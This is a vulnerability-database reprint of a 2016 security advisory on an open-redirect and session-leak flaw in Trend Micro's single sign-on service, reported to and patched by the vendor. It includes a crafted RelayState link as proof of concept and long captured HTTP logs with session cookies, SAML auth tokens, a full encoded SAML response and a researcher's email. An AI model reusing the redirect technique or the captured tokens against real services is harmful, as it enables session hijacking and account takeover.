Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TrendMicro SSO Redirect / Session Theft

🗓️ 31 Mar 2016 00:00:00Reported by Hadji SamirType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 62 Views

TrendMicro SSO Redirect & Session Theft Vulnerability in Account System (Web-Application) 2016 Q

Code
`  
Document Title:  
===============  
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=1694  
  
Trand Micro ID: 1-1-1035080936  
  
  
Release Date:  
=============  
2016-03-31  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1694  
  
  
Common Vulnerability Scoring System:  
====================================  
6.5  
  
  
Product & Service Introduction:  
===============================  
Trend Micro Inc. is a global security software company founded in Los  
Angeles, California with global headquarters in Tokyo, Japan, and regional  
headquarters in Asia, Europe and the Americas. The company develops  
security software for servers, cloud computing environments, and small  
business.  
Its cloud and virtualization security products provide cloud security  
for customers of VMware, Amazon AWS, Microsoft Azure and vCloud Air. Eva  
Chen  
serves as Trend Micro’s chief executive officer, a position she has held  
since 2005 when she succeeded founding CEO Steve Chang. Chang serves as  
chairman of Trend Micro.  
  
(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )  
  
  
Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a redirect  
and session web vulnerability in the official trend micro sso online  
service web-application.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri  
- Evolution Security GmbH)  
2016-01-29: Vendor Notification (Trend Micro Security Team)  
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)  
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)  
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]  
2016-03-31: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
Trend Micro  
Product: Account System - (Web-Application) 2016 Q1  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
A redirect issue with information leaking has been discovered in the  
official Trendmirco online-service web-application.  
The vulnerability allows an attacker to send a crafted link to the  
victim. The execution (which requires a login) will disclose leaking  
information to the attackers webserver.  
In this case the AuthState value is beeing leaked.  
  
The vulnerability is located in the SSOService.php. A remote attacker is  
able to craft a link by modifing the RelayState parameter to his  
webserver. After the link is clicked  
by the victim the website requests him to login. After the login the  
victim is beeing quitly redirected to the webserver. The previous  
requests includes the new AuthState in  
the GET request which includes the users session. The AuthState is  
beeing exposed in the Referer afterwards. The attacker can use the  
AuthState value to overtake the account session.  
  
The vulnerability is located in the SSOService.php. A remote attacker is  
able to craft a link by modifing the RelayState parameter to his  
webserver. After the link is clicked by  
the victim the website requests him to login. After the login the victim  
is beeing quitly redirected to the webserver. The previous requests  
includes the new AuthState in the GET  
request which includes the users session. The AuthState is beeing  
exposed in the Referer afterwards. The attacker can use the AuthState  
value to overtake the account session.  
  
  
Proof of Concept (PoC):  
=======================  
The vulnerability can be exploited by remote attackers without  
privileged web-application user account and low user interaction.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below to continue.  
  
Manual steps to reproduce the vulnerability ...  
1. Send the victim the link  
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US  
2. The victim will redirect to yahoo  
3. The AuthState code will cached on the referer of the attackers  
website ... like on yahoo  
4. Successful reproduce of the vulnerability!  
  
  
--- PoC Session Logs [POST & GET] ---  
GET  
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US  
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content  
Size[-1] Mime Type[text/html]  
Request Headers:  
Host[sso1.trendmicro.com]  
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)  
Gecko/20100101 Firefox/44.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[en-US,en;q=0.5]  
Accept-Encoding[gzip, deflate, br]  
Cookie[_ga=GA1.2.1194930175.1453994345;  
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;  
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;  
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; my_username=; mmcore.tst=0.405;  
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;  
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;  
mmcore.srv=ldnvwcgus01;  
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;  
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);  
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;  
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;  
optimizelyBuckets=%7B%7D;  
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};  
__qca=P0-2089330722-1453996387067;  
mbox=session#1454067243496-470264#1454070070;  
SimpleSAMLSessionID=28119447668568dc25d9f927a3de8b8d; cmTPSet=Y;  
db_sampling_40=other; CMAVID=30051452809679160476046; s_cc=true;  
ga_user_id=1194930175.1453994345;  
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;  
SimpleSAMLAuthToken=_14b1a6b84f5a4395934a9852d7f54a891925085f91]  
Connection[keep-alive]  
Response Headers:  
Date[Fri, 29 Jan 2016 12:20:22 GMT]  
Server[Apache/2.2.15 (CentOS)]  
Strict-Transport-Security[max-age=63072000; includeSubdomains;  
preload]  
X-Frame-Options[SAMEORIGIN]  
x-content-type-options[nosniff]  
Connection[close]  
Transfer-Encoding[chunked]  
Content-Type[text/html; charset=UTF-8]  
  
  
  
POST  
https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php/myaccount-sp  
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content  
Size[368] Mime Type[text/html]  
Request Headers:  
Host[account.trendmicro.com]  
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)  
Gecko/20100101 Firefox/44.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[en-US,en;q=0.5]  
Accept-Encoding[gzip, deflate, br]  
  
Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US]  
Cookie[_ga=GA1.2.1194930175.1453994345;  
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;  
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;  
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; mmcore.tst=0.405;  
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;  
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;  
mmcore.srv=ldnvwcgus01;  
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;  
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);  
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;  
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;  
optimizelyBuckets=%7B%7D;  
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};  
__qca=P0-2089330722-1453996387067;  
mbox=session#1454067243496-470264#1454070070; s_cc=true;  
ga_user_id=1194930175.1453994345;  
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;  
SimpleSAMLSessionID=01618d37b8c219c72821da79e9405c3f;  
SimpleSAMLAuthToken=_a33b2c8d226a1c70d1cf6e4b00d4f6915ce83e9773]  
Connection[keep-alive]  
Post Data:  
SAMLResponse[PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iIElEPSJfZGZkMjU2NGNkNjI1NTYzOTBjNDI1ZGJiOTA4YWY1MDNiOGQ1ZmUwMmJiIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiIERlc3RpbmF0aW9uPSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIj48c2FtbDpJc3N1ZXI%2BaHR0cHM6Ly9zc28xLnRyZW5kbWljcm8uY29tL3NpZ25pbi9zYW1sMi9pZHAvbWV0YWRhdGEucGhwPC9zYW1sOklzc3Vlcj48ZHM6U2lnbmF0dXJlIHhtbG5zOmRzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjIj4KICA8ZHM6U2lnbmVkSW5mbz48ZHM6Q2Fub25pY2FsaXphdGlvbk1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPgogICAgPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPgogIDxkczpSZWZlcmVuY2UgVVJJPSIjX2RmZDI1NjRjZDYyNTU2MzkwYzQyNWRiYjkwOGFmNTAzYjhkNWZlMDJiYiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPjwvZHM6VHJhbnNmb3Jtcz48ZHM6RGlnZXN0TWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3NoYTEiLz48ZHM6RGlnZXN0VmFsdWU%2BSDNlcVhEaWVOWG5YcnBRaUZ4cmxYZ25tbVJnPTwvZHM6RGlnZXN0VmFsdWU%2BPC9kczpSZWZlcmVuY2U%2BPC9kczpTaWduZWRJbmZvPjxkczpTaWduYXR1cmVWYWx1ZT5tTGVPZkpDZFRkQzRPTXp4dVk2NnEvcE91UG5LYUxTS2tBY1Y4RFoxM25iNklSSEFTV3hVL3dlZE96OU9WaXN6Y2lTN0h6dlpSQ2djQXo3amgwdTlpazlmam4yNE5PR09ObjZySG9ra0xQaXY4N2FpUWMvSkN6emd1M1pmQzcrV3pXOXY4QW5DZjIxWmZ6RDArWDZyb3lvLzkrQkVXVmtJVmkzNklEWVdWOFJSeXVqTVFQUFQxZ3NXYTVXUzQ3aE5WUmdZcyt3YmlzbklGMG81TWovaWlUdjdobUZaQ2VDTWljMm03RENQM2lnQlR3R0hrZnpsUC9FdldGcXJldnV3clZkVS9VS3FDRjltcXNjeG5INWE5YkNxZmU2ekIzK2wzdHZkSDgwd0Z3Tkg0aldvSWRXY1hPOTZEbUQ2MEs0QUQ1YVpIcW45Uk9YR1JwaUNyanhRL0E9PTwvZHM6U2lnbmF0dXJlVmFsdWU%2BCjxkczpLZXlJbmZvPjxkczpYNTA5RGF0YT48ZHM6WDUwOUNlcnRpZmljYXRlPk1JSURGRENDQWZ5Z0F3SUJBZ0lKQUtoSmdOUDAvZzZhTUEwR0NTcUdTSWIzRFFFQkJRVUFNQkF4RGpBTUJnTlZCQU1UQlZSbGNuSmhNQjRYRFRFeE1ERXdNekF5TURFME4xb1hEVEl3TVRJek1UQXlNREUwTjFvd0VERU9NQXdHQTFVRUF4TUZWR1Z5Y21Fd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURad2FJSmVwdHJJaVV4WjVXbDVMVVEvS0VpbEtPRmRZTWdTSjg0RkxDRTNXYlk2U1NWcURqWmYvcEM1dU4waFg4R0xPL3Z2UExVaGFHa1ZpdXhzSVRYM1VOUThLT1VlVW1lMHBVb1lFSWxFbjdJRmZuR29SQlV1eDJaTkVXVWRXelV3Z3RrR2dqRzhnTnROTGlnT3ZJN1ZPTndPZEM3bzZ0TUlHWm12azA1NFZLN2ZKMTkyTTJYNnNmay9YQnBicE5NWk5hQWRrR2dISlJqNk9UR2I5QkFPbzR3M2E3RTd0eVRveEd2czFpQWtQalg1SXE2NGltTFdnOW1OWjMvNkpZOHVhMkVpcXZhU0lsSHFZZzNJNjA2OEdCYlhZeDJtZmNLdlNFbTBwdDFoTm0zOExGdVVJNC9TQm1vVDFKeXRLcTIvQnNLc2o3RnZDWkRYck5Xb1NRcEFnTUJBQUdqY1RCdk1CMEdBMVVkRGdRV0JCUzF3OU1HSWRxMmQ2MmlVSkJFKzdLem5xNTFOVEJBQmdOVkhTTUVPVEEzZ0JTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5hRVVwQkl3RURFT01Bd0dBMVVFQXhNRlZHVnljbUdDQ1FDb1NZRFQ5UDRPbWpBTUJnTlZIUk1FQlRBREFRSC9NQTBHQ1NxR1NJYjNEUUVCQlFVQUE0SUJBUUFQbDFtb0hUTGg1M3BkOGdhVU9uY1FJUFB6dFBvR1NiVURpclA2OFk5SVhGYmwwd3I3NnlFK0ROYys1cEExK0xZNDkvdjBPZ3BuTXY3UGlPTFhMQzNhdnpKVFhkSW9GS2Z2Mno3T24zaEp1d3EyUHpacHF4RXVzVEdHSkRHaW9BSnJSOU1PSzQ5Q1hVYmdaMTVvY0ZkUXVpays5ZDJXaHJqQW1ueEtLbVVJZWxOOEpWVjFTQWhwOUpjN2NiZTJJZVl0cFViSyt0QnVROFFvT01tTUtxTEh3UE5ad2RYT0o1NWFsNHBLT3VzVTJSOXpyZnREWXlFUU1KOHVIZkdCSzZtYnoxWEFDOG9QUW5FQ2VkS0I4a3I0eG9md09aWjRCSmNZZDhNQ3ptNUNXRmtBRHljQTRrNlVvd1pnODY0dWFEbk1lZ2VxN1Vwd3NlZks3RzFJVzdpSzwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BPC9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1scDpTdGF0dXM%2BPHNhbWxwOlN0YXR1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2VzcyIvPjwvc2FtbHA6U3RhdHVzPjxzYW1sOkFzc2VydGlvbiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIElEPSJfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNi0wMS0yOVQxMjoyMDoyM1oiPjxzYW1sOklzc3Vlcj5odHRwczovL3NzbzEudHJlbmRtaWNyby5jb20vc2lnbmluL3NhbWwyL2lkcC9tZXRhZGF0YS5waHA8L3NhbWw6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPgogIDxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BCiAgICA8ZHM6U2lnbmF0dXJlTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI3JzYS1zaGExIi8%2BCiAgPGRzOlJlZmVyZW5jZSBVUkk9IiNfOGE1MTYzMzc3NWIxNjJmOWRlOGZhMmEwMDQwY2I1ZDdmZTEzYjdiMzdmIj48ZHM6VHJhbnNmb3Jtcz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnI2VudmVsb3BlZC1zaWduYXR1cmUiLz48ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPC9kczpUcmFuc2Zvcm1zPjxkczpEaWdlc3RNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjc2hhMSIvPjxkczpEaWdlc3RWYWx1ZT5sbk1xNmtkUHdCdTJ3WE04cjRZeEdqNGRMUFk9PC9kczpEaWdlc3RWYWx1ZT48L2RzOlJlZmVyZW5jZT48L2RzOlNpZ25lZEluZm8%2BPGRzOlNpZ25hdHVyZVZhbHVlPmpZbkxvblhIdEdCOGlxODRQZFpXOWpFdzJndWRxM0tEQ3FyMGtEQjl4TW4xUXE3TG1FQ3B6cUFRei93ZFFVSUx6cHlRNFgvQWREME5nTFJudk1nK0dEWmNjRWZvUWhTVC9VSithdmJHVFAvMTFrM2Mvczl5c0ZwcjlKSG5LOU9uMkUxUVlBeXdEMnhIWHE4NnZjNEU1YjVOYzM4MFozeUpkYi8yNmwxQllrWm9wV3ltMGY4L0EzUmJENlJNdkFBK1VPajUwK0FTcnMwa0N3SEdJSllCS2hwM3BwQXhPMWg3bkNqVGUremx2elpOV3RFTDNtOFpRQjhSckhQVU9CR2FZdjZTQTBHNDBRNkFyeE4yR3BHVjJENzN5MWprQ2ZSK0Q3d0RqUTMrRlBPekozNGo0L2haUi9seWJqeFRqTkFNUVpDbWk5UFM2dzNXcTJDL3EydHo3Zz09PC9kczpTaWduYXR1cmVWYWx1ZT4KPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJREZEQ0NBZnlnQXdJQkFnSUpBS2hKZ05QMC9nNmFNQTBHQ1NxR1NJYjNEUUVCQlFVQU1CQXhEakFNQmdOVkJBTVRCVlJsY25KaE1CNFhEVEV4TURFd016QXlNREUwTjFvWERUSXdNVEl6TVRBeU1ERTBOMW93RURFT01Bd0dBMVVFQXhNRlZHVnljbUV3Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLQW9JQkFRRFp3YUlKZXB0cklpVXhaNVdsNUxVUS9LRWlsS09GZFlNZ1NKODRGTENFM1diWTZTU1ZxRGpaZi9wQzV1TjBoWDhHTE8vdnZQTFVoYUdrVml1eHNJVFgzVU5ROEtPVWVVbWUwcFVvWUVJbEVuN0lGZm5Hb1JCVXV4MlpORVdVZFd6VXdndGtHZ2pHOGdOdE5MaWdPdkk3Vk9Od09kQzdvNnRNSUdabXZrMDU0Vks3ZkoxOTJNMlg2c2ZrL1hCcGJwTk1aTmFBZGtHZ0hKUmo2T1RHYjlCQU9vNHczYTdFN3R5VG94R3ZzMWlBa1BqWDVJcTY0aW1MV2c5bU5aMy82Slk4dWEyRWlxdmFTSWxIcVlnM0k2MDY4R0JiWFl4Mm1mY0t2U0VtMHB0MWhObTM4TEZ1VUk0L1NCbW9UMUp5dEtxMi9Cc0tzajdGdkNaRFhyTldvU1FwQWdNQkFBR2pjVEJ2TUIwR0ExVWREZ1FXQkJTMXc5TUdJZHEyZDYyaVVKQkUrN0t6bnE1MU5UQkFCZ05WSFNNRU9UQTNnQlMxdzlNR0lkcTJkNjJpVUpCRSs3S3pucTUxTmFFVXBCSXdFREVPTUF3R0ExVUVBeE1GVkdWeWNtR0NDUUNvU1lEVDlQNE9takFNQmdOVkhSTUVCVEFEQVFIL01BMEdDU3FHU0liM0RRRUJCUVVBQTRJQkFRQVBsMW1vSFRMaDUzcGQ4Z2FVT25jUUlQUHp0UG9HU2JVRGlyUDY4WTlJWEZibDB3cjc2eUUrRE5jKzVwQTErTFk0OS92ME9ncG5NdjdQaU9MWExDM2F2ekpUWGRJb0ZLZnYyejdPbjNoSnV3cTJQelpwcXhFdXNUR0dKREdpb0FKclI5TU9LNDlDWFViZ1oxNW9jRmRRdWlrKzlkMldocmpBbW54S0ttVUllbE44SlZWMVNBaHA5SmM3Y2JlMkllWXRwVWJLK3RCdVE4UW9PTW1NS3FMSHdQTlp3ZFhPSjU1YWw0cEtPdXNVMlI5enJmdERZeUVRTUo4dUhmR0JLNm1iejFYQUM4b1BRbkVDZWRLQjhrcjR4b2Z3T1paNEJKY1lkOE1Dem01Q1dGa0FEeWNBNGs2VW93Wmc4NjR1YURuTWVnZXE3VXB3c2VmSzdHMUlXN2lLPC9kczpYNTA5Q2VydGlmaWNhdGU%2BPC9kczpYNTA5RGF0YT48L2RzOktleUluZm8%2BPC9kczpTaWduYXR1cmU%2BPHNhbWw6U3ViamVjdD48c2FtbDpOYW1lSUQgU1BOYW1lUXVhbGlmaWVyPSJteWFjY291bnQtc3AiIEZvcm1hdD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOm5hbWVpZC1mb3JtYXQ6dHJhbnNpZW50Ij5fNWVkYmFkMzJmYzYyNWM4Y2VjZWM0MjRmZGQzYmE5ZGY0NmM5ZWY4OWVjPC9zYW1sOk5hbWVJRD48c2FtbDpTdWJqZWN0Q29uZmlybWF0aW9uIE1ldGhvZD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmNtOmJlYXJlciI%2BPHNhbWw6U3ViamVjdENvbmZpcm1hdGlvbkRhdGEgTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDEyOjI1OjIzWiIgUmVjaXBpZW50PSJodHRwczovL2FjY291bnQudHJlbmRtaWNyby5jb20vc2lnbmluL21vZHVsZS5waHAvdG1zYW1sL3NwL3NhbWwyLWFjcy5waHAvbXlhY2NvdW50LXNwIi8%2BPC9zYW1sOlN1YmplY3RDb25maXJtYXRpb24%2BPC9zYW1sOlN1YmplY3Q%2BPHNhbWw6Q29uZGl0aW9ucyBOb3RCZWZvcmU9IjIwMTYtMDEtMjlUMTI6MTk6NTNaIiBOb3RPbk9yQWZ0ZXI9IjIwMTYtMDEtMjlUMTI6MjU6MjNaIj48c2FtbDpBdWRpZW5jZVJlc3RyaWN0aW9uPjxzYW1sOkF1ZGllbmNlPm15YWNjb3VudC1zcDwvc2FtbDpBdWRpZW5jZT48L3NhbWw6QXVkaWVuY2VSZXN0cmljdGlvbj48L3NhbWw6Q29uZGl0aW9ucz48c2FtbDpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTYtMDEtMjlUMTE6NTE6MzlaIiBTZXNzaW9uTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDIwOjIwOjIzWiIgU2Vzc2lvbkluZGV4PSJfNzRhNjY1Y2I5NmE2ZDY0ZTQyZmE1YjhkNTAyYmRkYTEwNzZkMTQyMDhmIj48c2FtbDpBdXRobkNvbnRleHQ%2BPHNhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmQ8L3NhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BPC9zYW1sOkF1dGhuQ29udGV4dD48L3NhbWw6QXV0aG5TdGF0ZW1lbnQ%2BPHNhbWw6QXR0cmlidXRlU3RhdGVtZW50PjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj5zYW1pckBldm9sdXRpb24tc2VjLmNvbTwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudE5hbWUiIE5hbWVGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphdHRybmFtZS1mb3JtYXQ6YmFzaWMiPjxzYW1sOkF0dHJpYnV0ZVZhbHVlIHhzaTp0eXBlPSJ4czpzdHJpbmciPnNhbWlyQGV2b2x1dGlvbi1zZWMuY29tPC9zYW1sOkF0dHJpYnV0ZVZhbHVlPjwvc2FtbDpBdHRyaWJ1dGU%2BPHNhbWw6QXR0cmlidXRlIE5hbWU9IkNvbnN1bWVyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj41MDE5NzM3Mzwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ1dGVTdGF0ZW1lbnQ%2BPC9zYW1sOkFzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg%3D%3D]  
RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]  
Response Headers:  
Date[Fri, 29 Jan 2016 12:20:24 GMT]  
Server[Apache]  
  
Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e21d;  
